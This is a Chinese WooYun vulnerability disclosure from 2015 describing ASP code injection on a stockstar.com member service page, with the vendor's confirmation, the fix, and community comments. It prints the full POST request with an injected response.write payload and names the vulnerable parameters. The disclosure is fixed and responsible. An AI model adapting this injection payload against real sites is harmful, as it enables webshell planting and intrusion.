当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106939

漏洞标题:证券之星某站asp命令执行

相关厂商:证券之星

漏洞作者: 大懒

提交时间:2015-04-09 21:31

修复时间:2015-04-28 14:20

公开时间:2015-04-28 14:20

漏洞类型:命令执行

危害等级:中

自评Rank:7

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-09: 细节已通知厂商并且等待厂商处理中
2015-04-10: 厂商已经确认,细节仅向厂商公开
2015-04-20: 细节向核心白帽子及相关领域专家公开
2015-04-28: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

证券之星某站asp命令执行

详细说明:

POST请求
URL:http://member.stockstar.com/service/kefu/service_kf.asp
POST参数:Submit=%cc%e1%bd%bb&action=add&area=%22%2bresponse.write("hello+world")%2b%22&email=sample%40email.tst&memo=1&name=kobktwja&phone=555-666-0606&radiobutton=%d7%c9%d1%af&subject=1
存在问题的参数:action、area、email、memo、name、phone、radiobutton、subject
可能写马,命令执行,钓鱼等等多种利用方式

漏洞证明:

1.png


前台页面显示插入字符串

修复方案:

过滤用户可控输入的数据

版权声明:转载请注明来源 大懒@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-04-10 09:42

厂商回复:

感谢提供

最新状态:

2015-04-28:漏洞已修复,感谢提供


漏洞评价:

评论

  1. 2015-04-09 21:31 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    开脑洞

  2. 2015-04-10 00:12 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    看看命令执行。

  3. 2015-04-10 08:59 | 大懒 ( 普通白帽子 | Rank:239 漏洞数:45 )

    @xsser 啊?这只是个点,估计让你失望了

  4. 2015-04-10 08:59 | 大懒 ( 普通白帽子 | Rank:239 漏洞数:45 )

    @明月影 没有利用的思路,只是一个点,我也在学习中 ,共勉

  5. 2015-04-10 19:22 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    @大懒 看评论你的思路不错。我倒是想好好看看。

  6. 2015-04-20 16:14 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    洞主是如何发现这样的漏洞的。。神奇了。

  7. 2015-04-28 14:49 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    这个太神奇了 怎么发现的

  8. 2015-04-28 15:00 | 大懒 ( 普通白帽子 | Rank:239 漏洞数:45 )

    @梧桐雨 扫到的

  9. 2015-04-28 15:00 | 大懒 ( 普通白帽子 | Rank:239 漏洞数:45 )

    @scanf 扫到的

  10. 2015-04-28 16:40 | 圣路西法 ( 路人 | Rank:4 漏洞数:3 | 围观大神ส็็็็็็ ̷̸̨̀͒̏̃ͦ...)

    @大懒 又是神器?

  11. 2015-04-28 16:52 | Ztz ( 普通白帽子 | Rank:152 漏洞数:40 | 自由职业)

    command injection好多扫描器都可以扫。

  12. 2015-04-29 10:38 | LongY ( 实习白帽子 | Rank:83 漏洞数:11 | 强行送一血)

    @Ztz 求推荐扫描工具

  13. 2015-04-29 20:45 | Ztz ( 普通白帽子 | Rank:152 漏洞数:40 | 自由职业)

    @LongY netspark3 4都可以。

  14. 2015-04-30 09:55 | LongY ( 实习白帽子 | Rank:83 漏洞数:11 | 强行送一血)

    @Ztz netsparker 这个吧? 我用个试试 谢谢啊!